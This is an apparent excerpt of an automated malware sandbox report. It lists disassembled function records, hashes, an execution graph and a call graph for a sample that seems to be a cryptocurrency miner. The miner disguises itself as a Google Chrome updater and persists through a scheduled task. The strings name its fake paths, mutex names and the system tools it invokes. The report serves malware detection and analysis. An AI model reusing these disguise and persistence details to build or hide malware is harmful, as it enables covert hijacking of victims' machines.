                                                                                                                            • Instruction ID: 066f296e7c69333cf7eab93cc9b9949eb87835866d5e2c19bc447ded2b282f1c
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 2D51BD327016808AEB1DCF15E448B5937A5F364B98F568134DA8A43BC8EB3EDA81C746
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: fbf4d1ea09ca530c11bc050d45c78e5c1af422512be69d4936dbcf0bfcdabb2a
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 18316B32201A80D6EB19DF12E848B5977A4F760BD8F558124EEDA07BC8DB3EDA41C746
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: e2751f37c9afc06bab20269fd30b95b3ce7bf53436da13fe763090e07bb22a2b
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: C3D1ED36B04B8089E715CFB9D44429C3BA5F365B98F108226CE9997FD9DB3DC606CB41
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: 6fd4068f5fde012c4dde791a9f378234b0b4c7c006b5b8258291a18aebbb5ec4
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: CD91AC7670075085F768DF75D4883AD2BA4F726B88F144129DE8A67EC4DB3EC682CB02
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: 4d56da54cf78304b59e941c3840ad02a4e27cfa3874fb6ac860baba0de6867c0
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: 6B113026710F018AEB40DF75E8593A933A4F729B58F440E35DAAD46BA4DF7DC2988381
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: 6f851ab7d2fffd7563023ef623ee8a7de8c3bed235268dd0d459f42558e32ad4
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: 3A71A73620078185D72CEF25D8493A9A7A8FBA6B84F540135DE8A53FC9DF3EC7859701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 9af03a94526e124235052eff05af4d6ef70a64bd906bbf711c34630943867be5
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 31619A33A00B84CAEB28CF65D04439D77A0F764B88F144626EF8917B98DB3DD295C741
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: f057078fdf437363ca3006686a2bf0829581c85bcab3189ee86c3b948c680c9c
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: 8551D13220478181E76CEA29A15D3AAE799FBA5B40F440135DEDA03FC9CB3FC6848742
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: 35ef467bd1b652655df33300a8af76435eb501ed725965b0e419b5e742ae772f
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: 74419F76714B8082EB208F25E8483AEB7A4F7A9794F544131EE8D87BD4EB3DC641CB51
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: 0e956435bf9f0bef2125082f9e1e6bfa42cb3a6339d934bf258d92915eab66d0
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: 06110D36214B8082EB658F25F444359B7E9FB98B94F584225EECD07B99DF3DC691CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: 42c6951a3d5e62022741cb552a0faaa8dc454750388d80c2111df8216ab36858
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: 26E08661640B4491DF058F22E84429873A4DB68B64B989132999C06351FA3CD2E9C301
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: 220dd3407894242afa797735461295e715a9582d507b77829c604985c3d977a1
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: E9E08661600B4480DF058F22D8401987364EB68B64F989132C98C06351EA3CD2E5C301
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: f1725fcd5410c0a07ce4f1123f09774ab2f82a588070bbaed81ab7e775db846a
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: B1118F25701B5481EB08DB66E40A26AB7A5FB99FC0F185034DECD83BA5DE3ED582C701
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: 1cfd4273923a9902b80302180c9fa92e6bed877094e565062285121f79e1ac25
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 2DE03235B01A0486EB08AB62D80834A36E5FB99F06F0880248989077A1DF7EC699CF91

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:26.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:158
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 2961 7ff75e94131a 2962 7ff75e941131 26 API calls 2961->2962 2963 7ff75e94132e 2962->2963 2924 7ff75e943ef9 SetUnhandledExceptionFilter 2964 7ff75e9439d8 2965 7ff75e9439ea EnterCriticalSection 2964->2965 2966 7ff75e943a44 2964->2966 2968 7ff75e943a03 2965->2968 2967 7ff75e943a3b LeaveCriticalSection 2967->2966 2968->2967 2969 7ff75e943a28 free 2968->2969 2969->2967 2925 7ff75e942c3e 2930 7ff75e942b64 2925->2930 2927 7ff75e942c66 2929 7ff75e942c73 2927->2929 2933 7ff75e941b49 2927->2933 2931 7ff75e94248c wcslen 2930->2931 2932 7ff75e942b77 2931->2932 2932->2927 2935 7ff75e941b99 2933->2935 2934 7ff75e941cbf wcsncmp 2934->2935 2935->2934 2935->2935 2936 7ff75e941d65 2935->2936 2937 7ff75e941ef7 wcslen 2936->2937 2938 7ff75e941f11 2936->2938 2937->2938 2938->2929 2973 7ff75e94389e 2974 7ff75e9438a3 signal 2973->2974 2975 7ff75e943831 2974->2975 2976 7ff75e9438b5 signal 2974->2976 2976->2975 2812 7ff75e9412fd 2815 7ff75e941131 2812->2815 2816 7ff75e94115a 2815->2816 2817 7ff75e941172 2816->2817 2818 7ff75e941169 Sleep 2816->2818 2819 7ff75e941188 _amsg_exit 2817->2819 2820 7ff75e941194 2817->2820 2818->2816 2821 7ff75e9411b5 2819->2821 2820->2821 2822 7ff75e94119a _initterm 2820->2822 2823 7ff75e9411de 2821->2823 2824 7ff75e9411c5 _initterm 2821->2824 2822->2821 2836 7ff75e9434fb 2823->2836 2824->2823 2827 7ff75e94122e 2828 7ff75e941233 malloc 2827->2828 2829 7ff75e941253 2828->2829 2830 7ff75e941258 strlen malloc 2829->2830 2831 7ff75e941283 2829->2831 2830->2829 2847 7ff75e943f60 2831->2847 2833 7ff75e9412c4 2834 7ff75e9412e8 2833->2834 2835 7ff75e9412e3 _cexit 2833->2835 2835->2834 2837 7ff75e941208 SetUnhandledExceptionFilter 2836->2837 2839 7ff75e943519 2836->2839 2837->2827 2838 7ff75e94371f 2838->2837 2841 7ff75e943747 VirtualProtect 2838->2841 2839->2838 2840 7ff75e943590 2839->2840 2846 7ff75e9435cf 2839->2846 2840->2838 2842 7ff75e9435ae 2840->2842 2841->2838 2842->2840 2868 7ff75e9433b4 2842->2868 2844 7ff75e94363a 2845 7ff75e9433b4 3 API calls 2844->2845 2845->2846 2846->2838 2846->2844 2850 7ff75e943f76 2847->2850 2848 7ff75e945068 2848->2833 2850->2848 2850->2850 2875 7ff75e94223c wcslen 2850->2875 2851 7ff75e94421b 2852 7ff75e94223c 3 API calls 2851->2852 2853 7ff75e94450b 2852->2853 2854 7ff75e94223c 3 API calls 2853->2854 2855 7ff75e94465a 2854->2855 2880 7ff75e9413b8 2855->2880 2857 7ff75e94481e 2890 7ff75e9425ae 2857->2890 2859 7ff75e9449b4 _wcsicmp 2866 7ff75e94491b 2859->2866 2861 7ff75e94223c 3 API calls 2861->2866 2864 7ff75e944f68 2864->2833 2865 7ff75e94219e wcslen wcsncmp wcslen 2865->2866 2866->2859 2866->2861 2866->2864 2866->2865 2893 7ff75e9427e2 2866->2893 2896 7ff75e94272b 2866->2896 2900 7ff75e942789 2866->2900 2903 7ff75e9426ad 2866->2903 2869 7ff75e9433da 2868->2869 2870 7ff75e94343f VirtualQuery 2869->2870 2874 7ff75e9434e3 2869->2874 2871 7ff75e943468 2870->2871 2872 7ff75e943497 VirtualProtect 2871->2872 2871->2874 2873 7ff75e9434cf GetLastError 2872->2873 2872->2874 2873->2874 2874->2842 2876 7ff75e942254 2875->2876 2877 7ff75e94225a _wcsnicmp 2876->2877 2878 7ff75e94226c 2876->2878 2877->2878 2879 7ff75e942275 wcslen 2877->2879 2878->2851 2879->2876 2881 7ff75e9413f9 2880->2881 2882 7ff75e941740 _wcsnicmp 2881->2882 2883 7ff75e9415c6 2881->2883 2882->2883 2885 7ff75e941772 2882->2885 2883->2857 2884 7ff75e9417d8 _wcsnicmp 2884->2883 2887 7ff75e9417f3 2884->2887 2885->2884 2885->2885 2886 7ff75e94185d _wcsnicmp 2886->2883 2889 7ff75e94187c 2886->2889 2887->2886 2887->2887 2888 7ff75e941908 wcsstr 2888->2883 2889->2888 2889->2889 2908 7ff75e942523 2890->2908 2892 7ff75e9425c2 2892->2866 2894 7ff75e94228e wcslen 2893->2894 2895 7ff75e94280d 2894->2895 2895->2866 2897 7ff75e94275b 2896->2897 2898 7ff75e9426ad 2 API calls 2897->2898 2899 7ff75e942773 2898->2899 2899->2866 2901 7ff75e942523 wcslen 2900->2901 2902 7ff75e942796 2901->2902 2902->2866 2914 7ff75e942427 wcslen 2903->2914 2907 7ff75e9426d5 2907->2866 2911 7ff75e94228e 2908->2911 2910 7ff75e94254f 2910->2892 2912 7ff75e9422d0 2911->2912 2913 7ff75e94234d wcslen 2912->2913 2913->2910 2916 7ff75e942453 2914->2916 2917 7ff75e942480 2916->2917 2921 7ff75e942390 2916->2921 2918 7ff75e94248c 2917->2918 2919 7ff75e94228e wcslen 2918->2919 2920 7ff75e9424bd 2919->2920 2920->2907 2922 7ff75e94228e wcslen 2921->2922 2923 7ff75e9423c1 2922->2923 2923->2916 2939 7ff75e9431fc 2940 7ff75e94320e 2939->2940 2942 7ff75e943223 2940->2942 2943 7ff75e943a4d 2940->2943 2944 7ff75e943a5b 2943->2944 2947 7ff75e943a63 2943->2947 2945 7ff75e943a71 2944->2945 2946 7ff75e943a61 2944->2946 2944->2947 2945->2947 2948 7ff75e943a7b InitializeCriticalSection 2945->2948 2946->2947 2949 7ff75e943ab9 free 2946->2949 2950 7ff75e943ac7 DeleteCriticalSection 2946->2950 2947->2942 2948->2947 2949->2946 2950->2947 2954 7ff75e941001 2956 7ff75e94103c __set_app_type 2954->2956 2957 7ff75e9410a9 2956->2957 2980 7ff75e9431e0 2981 7ff75e9431e9 2980->2981 2982 7ff75e9431f2 2981->2982 2983 7ff75e943a4d 3 API calls 2981->2983 2983->2982 2984 7ff75e943260 2985 7ff75e943287 2984->2985 2986 7ff75e9432f3 fprintf 2985->2986 2987 7ff75e943826 2988 7ff75e9438a3 signal 2987->2988 2989 7ff75e943831 2987->2989 2988->2989 2990 7ff75e9438b5 signal 2988->2990 2990->2989 2994 7ff75e943968 2995 7ff75e9439ce 2994->2995 2996 7ff75e943983 2994->2996 2996->2995 2997 7ff75e94399d EnterCriticalSection LeaveCriticalSection 2996->2997 2997->2995 3001 7ff75e943b71 strlen 3002 7ff75e943bd3 3001->3002 3003 7ff75e943b89 3001->3003 3003->3002 3004 7ff75e943bb6 strncmp 3003->3004 3004->3002 3004->3003 3005 7ff75e9437b4 3007 7ff75e9437b9 3005->3007 3006 7ff75e9437ff 3007->3006 3008 7ff75e94386f signal 3007->3008 3009 7ff75e943845 3007->3009 3008->3006 3008->3009 3009->3006 3010 7ff75e94388b signal 3009->3010 3010->3006

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_00007FF75E942FB9 77 Function_00007FF75E942F50 0->77 1 Function_00007FF75E9413B8 44 Function_00007FF75E943106 1->44 51 Function_00007FF75E943115 1->51 64 Function_00007FF75E942FF5 1->64 84 Function_00007FF75E943124 1->84 94 Function_00007FF75E941335 1->94 98 Function_00007FF75E94138A 1->98 2 Function_00007FF75E94C1B8 3 Function_00007FF75E9432BB 57 Function_00007FF75E943DE0 3->57 4 Function_00007FF75E943DC0 5 Function_00007FF75E9430C4 5->77 6 Function_00007FF75E9432C4 6->57 7 Function_00007FF75E9429C9 19 Function_00007FF75E9429A0 7->19 8 Function_00007FF75E943DC8 9 Function_00007FF75E942FC8 9->77 10 Function_00007FF75E9431D0 11 Function_00007FF75E9430D0 11->77 12 Function_00007FF75E9419D4 12->94 13 Function_00007FF75E94309A 13->77 14 Function_00007FF75E943297 14->57 15 Function_00007FF75E94219E 21 Function_00007FF75E9430A6 15->21 15->64 73 Function_00007FF75E941B49 15->73 74 Function_00007FF75E941948 15->74 109 Function_00007FF75E943D60 15->109 16 Function_00007FF75E94389E 70 Function_00007FF75E943340 16->70 17 Function_00007FF75E941A9B 17->11 17->64 17->98 18 Function_00007FF75E943DA0 20 Function_00007FF75E9432A0 20->57 21->77 22 Function_00007FF75E942FAA 22->77 23 Function_00007FF75E9432A9 23->57 24 Function_00007FF75E9425AE 24->5 24->9 24->64 71 Function_00007FF75E943046 24->71 85 Function_00007FF75E942523 24->85 25 Function_00007FF75E9431AE 26 Function_00007FF75E9426AD 26->0 26->64 88 Function_00007FF75E942427 26->88 101 Function_00007FF75E94248C 26->101 27 Function_00007FF75E9432B2 27->57 28 Function_00007FF75E943DB0 29 Function_00007FF75E9430B5 29->77 30 Function_00007FF75E94C1B0 31 Function_00007FF75E9433B4 56 Function_00007FF75E943BE1 31->56 105 Function_00007FF75E943C8F 31->105 32 Function_00007FF75E9437B4 33 Function_00007FF75E943CB3 50 Function_00007FF75E943B10 33->50 95 Function_00007FF75E943B34 33->95 34 Function_00007FF75E9482B2 35 Function_00007FF75E9430FA 35->77 36 Function_00007FF75E9428F9 36->44 36->64 93 Function_00007FF75E943130 36->93 36->98 37 Function_00007FF75E943EF9 38 Function_00007FF75E9412FD 91 Function_00007FF75E941131 38->91 39 Function_00007FF75E9431FC 75 Function_00007FF75E943A4D 39->75 40 Function_00007FF75E9434FB 40->31 52 Function_00007FF75E943C14 40->52 40->109 41 Function_00007FF75E941001 41->10 41->18 41->28 42 Function_00007FF75E943E01 43 Function_00007FF75E942D00 44->77 45 Function_00007FF75E943004 45->77 46 Function_00007FF75E942D0A 47 Function_00007FF75E942D0C 47->43 48 Function_00007FF75E942F12 48->47 49 Function_00007FF75E943010 49->77 51->77 52->50 53 Function_00007FF75E9439D8 54 Function_00007FF75E9480D8 55 Function_00007FF75E9427E2 55->29 100 Function_00007FF75E94228E 55->100 56->50 58 Function_00007FF75E9431E0 58->75 59 Function_00007FF75E942FE6 59->77 60 Function_00007FF75E9429E3 66 Function_00007FF75E94303A 60->66 90 Function_00007FF75E94302B 60->90 61 Function_00007FF75E9410E8 62 Function_00007FF75E9430EE 62->77 63 Function_00007FF75E943CF2 63->50 63->95 64->77 65 Function_00007FF75E942AF5 65->45 66->77 67 Function_00007FF75E943C3A 67->50 68 Function_00007FF75E942C3E 68->65 68->73 82 Function_00007FF75E94301F 68->82 102 Function_00007FF75E942A8C 68->102 111 Function_00007FF75E942B64 68->111 69 Function_00007FF75E94223C 71->77 72 Function_00007FF75E942A46 72->90 73->13 73->43 73->62 73->71 73->94 96 Function_00007FF75E94307C 73->96 73->98 103 Function_00007FF75E94308B 73->103 107 Function_00007FF75E943061 73->107 75->70 76 Function_00007FF75E943052 76->77 77->48 78 Function_00007FF75E941350 79 Function_00007FF75E943254 80 Function_00007FF75E94131A 80->91 81 Function_00007FF75E943E21 82->77 83 Function_00007FF75E943826 83->70 84->77 85->49 85->100 86 Function_00007FF75E943F29 87 Function_00007FF75E942828 87->13 87->35 88->64 104 Function_00007FF75E942390 88->104 89 Function_00007FF75E94272B 89->12 89->26 90->77 91->8 91->25 91->40 91->70 108 Function_00007FF75E943F60 91->108 92 Function_00007FF75E943F30 93->77 96->77 97 Function_00007FF75E942884 97->44 97->64 97->98 99 Function_00007FF75E942789 99->64 99->85 106 Function_00007FF75E942F8F 99->106 100->94 101->22 101->100 102->7 102->60 102->72 102->76 103->77 104->22 104->100 105->50 106->77 107->77 108->1 108->11 108->12 108->15 108->17 108->24 108->25 108->26 108->43 108->55 108->69 108->87 108->89 108->92 108->94 108->97 108->98 108->99 108->109 113 Function_00007FF75E94306D 108->113 110 Function_00007FF75E943260 110->57 111->0 111->59 111->64 111->101 111->106 112 Function_00007FF75E943968 113->77 114 Function_00007FF75E943B71 114->50 115 Function_00007FF75E943770

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3714283218-0
                                                                                                                            • Opcode ID: 1afb8f11758ab12f269ae9a193c80dd6acf9b043bf5bbc259c0b9bc123598646
                                                                                                                            • Instruction ID: f2260eb9b4ee50c6167332b570a1ecc088238642f63feb57532cb6adb7cc8205
                                                                                                                            • Opcode Fuzzy Hash: 1afb8f11758ab12f269ae9a193c80dd6acf9b043bf5bbc259c0b9bc123598646
                                                                                                                            • Instruction Fuzzy Hash: F9516465E09B4689FB65FB22EA50279A3A1BF48B84FCC4035DD0D47395EF3DE8418322
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true
                                                                                                                            • Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsicmp_wcsnicmpwcslen
                                                                                                                            • String ID: /$0$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$[$\BaseNamedObjects\qqgnfenfemxxtpha$\BaseNamedObjects\teunnffqjjjv$\BaseNamedObjects\vnwbctewzlhbedeyovzifuso$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
                                                                                                                            • API String ID: 3926934318-1443233506
                                                                                                                            • Opcode ID: e6e2230000fe7e6ce9fcbc56bd5262af9a76e49582b639d4e62c80a508ad9f73
                                                                                                                            • Instruction ID: 10ee615c56acd45b79dbe594495df03b06a82e19a63e18968140ea3318a135ce
                                                                                                                            • Opcode Fuzzy Hash: e6e2230000fe7e6ce9fcbc56bd5262af9a76e49582b639d4e62c80a508ad9f73
